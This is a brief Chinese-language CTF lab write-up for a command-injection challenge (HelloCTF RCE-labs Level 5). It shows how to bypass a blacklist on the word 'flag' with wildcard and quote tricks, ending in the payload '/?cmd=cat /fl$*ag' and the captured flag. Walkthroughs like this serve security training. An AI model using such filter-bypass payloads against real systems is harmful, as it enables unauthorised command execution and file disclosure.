HelloCTF [RCE-labs] Level 5 - 黑名单式过滤

开启靶场,打开链接:

GET传参cmd,且对flag字符串进行了过滤

\*绕过,fl*ag

用'绕过,f''lag或f'l'ag

当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)


/?cmd=cat /fl$*ag

成功得到flag:

NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}

相关推荐
李白你好6 小时前
CyberPoC 是一个现代化的网络安全练习和竞赛平台,支持容器化部署的安全挑战,为用户提供实践网络安全技能的环境。
web安全
悠悠~飘8 小时前
php简介(第一天打卡)
php
房屋安全鉴定检测11 小时前
房屋安全鉴定报告有效期多久
安全·网络安全
心 一11 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
久绊A11 小时前
Hydra-SSH 破解安全防范
开发语言·php
黑白世界464812 小时前
开源分享: php-tools php gui的一次尝试
后端·php
房屋安全鉴定检测12 小时前
房屋安全鉴定需要什么条件
安全·网络安全
FLS16814 小时前
Kali搭建sqli-labs靶场
linux·sql·安全·网络安全
不是三毛没有半14 小时前
华为USG6000v2 NAT模式下IPSEC IKE V1 实验
网络·网络安全·华为
2503_9284115615 小时前
9.8 ajax+php基础语法
ajax·okhttp·php